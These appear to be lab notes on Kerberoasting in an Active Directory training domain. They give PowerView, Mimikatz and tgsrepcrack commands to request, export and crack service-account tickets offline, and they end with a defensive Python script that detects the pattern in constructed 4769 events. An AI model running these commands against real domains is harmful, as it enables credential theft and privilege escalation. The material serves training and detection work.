Priv Esc - Kerberoast

  • Offline cracking of service account passwords.

  • The Kerberos service ticket (TGS) has a server portion that is encrypted with the password hash of the service account. This makes it possible to request a ticket and attack the password offline.

  • Service accounts are often neglected (passwords are rarely changed) and frequently have privileged access.

  • Password hashes of service accounts could be used to create Silver Tickets.

Import-Module powerview.ps1

#Find User Accounts used as Service Accounts
Get-NetUser -SPN

#We are going after svcadmin MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local PrincipalName
Request-SPNTicket MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local

#Export All tickets
import-module ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls

#Crack the Service account password located in the C:\AD\Tools\kerberoast
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi


#Import AD Module
Import-Module .\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.d
Import-Module .\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

#Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Get-NetUser -SPN and Request-SPNTicket

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
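From the defender's side, every Request-SPNTicket or KerberosRequestorSecurityToken call above produces a Windows Security event 4769 (a Kerberos service ticket was requested) on the domain controller. The script below is an added example, not part of these notes: it runs two common detections over a constructed set of 4769 records, flagging RC4-HMAC (0x17) service tickets requested for user-account SPNs and one requester fetching tickets for many distinct SPNs in a short window. The field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress) are those of the real event, but all values, hosts and the 5-minute/3-SPN thresholds are assumptions for illustration.

```python
"""Kerberoast-pattern detection over Windows Security event 4769 records.

Added example, not part of the original notes. The records below are
constructed, not real logs; field names mirror the real 4769 event.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample of 4769 events, flattened the way a SIEM presents them.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "TargetUserName": "alice@CORP.EXAMPLE",
     "ServiceName": "HOST/fileserver", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2024-01-10T09:00:02", "TargetUserName": "alice@CORP.EXAMPLE",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    # Legacy computer account still negotiating RC4: noisy, not a Kerberoast signal.
    {"time": "2024-01-10T09:01:00", "TargetUserName": "bob@CORP.EXAMPLE",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    # One account requesting RC4 tickets for several user-account SPNs in seconds.
    {"time": "2024-01-10T09:05:00", "TargetUserName": "student@CORP.EXAMPLE",
     "ServiceName": "MSSQLSvc/db01", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    {"time": "2024-01-10T09:05:03", "TargetUserName": "student@CORP.EXAMPLE",
     "ServiceName": "HTTP/web01", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    {"time": "2024-01-10T09:05:09", "TargetUserName": "student@CORP.EXAMPLE",
     "ServiceName": "MSSQLSvc/db02", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    # A single RC4 request: caught by the encryption-type rule, not the fan-out rule.
    {"time": "2024-01-10T09:30:00", "TargetUserName": "carol@CORP.EXAMPLE",
     "ServiceName": "MSSQLSvc/db01", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.31"},
]


def parse_time(value):
    """Parse the ISO-8601 timestamp used in the constructed records."""
    return datetime.fromisoformat(value)


def is_user_spn_service(service_name):
    """True for SPNs owned by user/service accounts, i.e. not the KDC (krbtgt)
    and not computer accounts (names ending in '$'). Those are the accounts whose
    tickets are worth cracking, so they are the ones worth watching."""
    name = service_name.lower()
    return name != "krbtgt" and not name.endswith("$")


def find_rc4_requests(events):
    """Rule 1: RC4-encrypted service tickets for user-account SPNs.
    Returns (requester, service) pairs."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if e["TicketEncryptionType"].lower() == RC4_HMAC
            and is_user_spn_service(e["ServiceName"])]


def find_spn_fanout(events, window=timedelta(minutes=5), threshold=3):
    """Rule 2: a requester collecting tickets for >= threshold distinct
    user-account SPNs inside a sliding time window (any encryption type).
    Returns {requester: sorted list of SPNs seen in a triggering window}."""
    by_requester = defaultdict(list)
    for e in events:
        if is_user_spn_service(e["ServiceName"]):
            by_requester[e["TargetUserName"]].append((parse_time(e["time"]), e["ServiceName"]))
    hits = {}
    for requester, reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= threshold:
                hits.setdefault(requester, set()).update(spns)
    return {r: sorted(s) for r, s in hits.items()}


def detect(events, **fanout_kwargs):
    """Run both rules and return their findings keyed by rule name."""
    return {"rc4_service_tickets": find_rc4_requests(events),
            "spn_fanout": find_spn_fanout(events, **fanout_kwargs)}


if __name__ == "__main__":
    for rule, result in detect(SAMPLE_4769).items():
        print(rule, result)
```

The encryption-type rule only pays off once the domain's service accounts are AES-only, so that an RC4 ticket stands out; the fan-out rule works regardless of cipher but needs its window and threshold tuned against a baseline of normal ticket volume. Both are cheap to run against 4769 exports and complement the preventive fixes for the bullets above: long random passwords or group Managed Service Accounts for anything with an SPN, and minimal privileges on those accounts.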
